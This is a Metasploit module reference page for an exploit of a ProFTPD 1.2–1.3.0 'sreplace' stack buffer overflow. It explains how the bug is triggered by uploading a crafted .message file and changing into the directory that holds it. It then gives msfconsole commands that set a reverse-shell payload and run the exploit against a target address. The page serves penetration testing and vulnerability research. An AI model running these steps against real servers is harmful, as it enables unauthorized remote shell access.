Home > Browse Exploits

Browse Exploit & Auxiliary Modules

The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.

Search for modules

ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)

This module exploits a stack-based buffer overflow in versions 1.2 through 1.3.0 of ProFTPD server. The vulnerability is within the "sreplace" function within the "src/support.c" file. The off-by-one heap overflow bug in the ProFTPD sreplace function has been discovered about 2 (two) years ago by Evgeny Legerov. We tried to exploit this off-by-one bug via MKD command, but failed. We did not work on this bug since then. Actually, there are exists at least two bugs in sreplace function, one is the mentioned off-by-one heap overflow bug the other is a stack-based buffer overflow via 'sstrncpy(dst,src,negative argument)'. We were unable to reach the "sreplace" stack bug on ProFTPD 1.2.10 stable version, but the version 1.3.0rc3 introduced some interesting changes, among them: 1. another (integer) overflow in sreplace! 2. now it is possible to reach sreplace stack-based buffer overflow bug via the "pr_display_file" function! 3. stupid '.message' file display bug So we decided to choose ProFTPD 1.3.0 as a target for our exploit. To reach the bug, you need to upload a specially created .message file to a writeable directory, then do "CWD <writeable directory>" to trigger the invocation of sreplace function. Note that ProFTPD 1.3.0rc3 has introduced a stupid bug: to display '.message' file you also have to upload a file named '250'. ProFTPD 1.3.0 fixes this bug. The exploit is a part of VulnDisco Pack since Dec 2005.

Rank

Great

Authors

Evgeny Legerov < admin [at] gleg.net >
jduck < jduck [at] metasploit.com >

References

Exploit Targets

0 - Automatic Targeting (default)
1 - Debug
2 - ProFTPD 1.3.0 (source install) / Debian 3.1

Development

Similar Modules

exploit/linux/ftp/proftp_telnet_iac

Usage Information

$ msfconsole

                ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/linux/ftp/proftp_sreplace
msf exploit(proftp_sreplace) > show payloads
msf exploit(proftp_sreplace) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(proftp_sreplace) > set LHOST [MY IP ADDRESS]
msf exploit(proftp_sreplace) > set RHOST [TARGET IP]
msf exploit(proftp_sreplace) > exploit

Module Options

FTPPASS	The password for the specified username (default: mozilla@example.com)
FTPUSER	The username to authenticate as (default: anonymous)
RHOST	The target address
RPORT	The target port (default: 21)
WRITABLE	A writable directory on the target host (default: /incoming)
CHOST	The local client address
CPORT	The local client port
ConnectTimeout	Maximum number of seconds to establish a TCP connection
ContextInformationFile	The information file that contains context information
DisablePayloadHandler	Disable the handler code for the selected payload
EnableContextEncoding	Use transient context when encoding payloads
FTPDEBUG	Whether or not to print verbose debug statements
FTPTimeout	The number of seconds to wait for a reply from an FTP command
Proxies	Use a proxy chain
SSL	Negotiate SSL for outgoing connections
SSLVersion	Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
VERBOSE	Enable detailed status messages
WORKSPACE	Specify the workspace for this module
WfsDelay	Additional delay when waiting for a session
TCP::max_send_size	Maxiumum tcp segment size. (0 = disable)
TCP::send_delay	Delays inserted before every send. (0 = disable)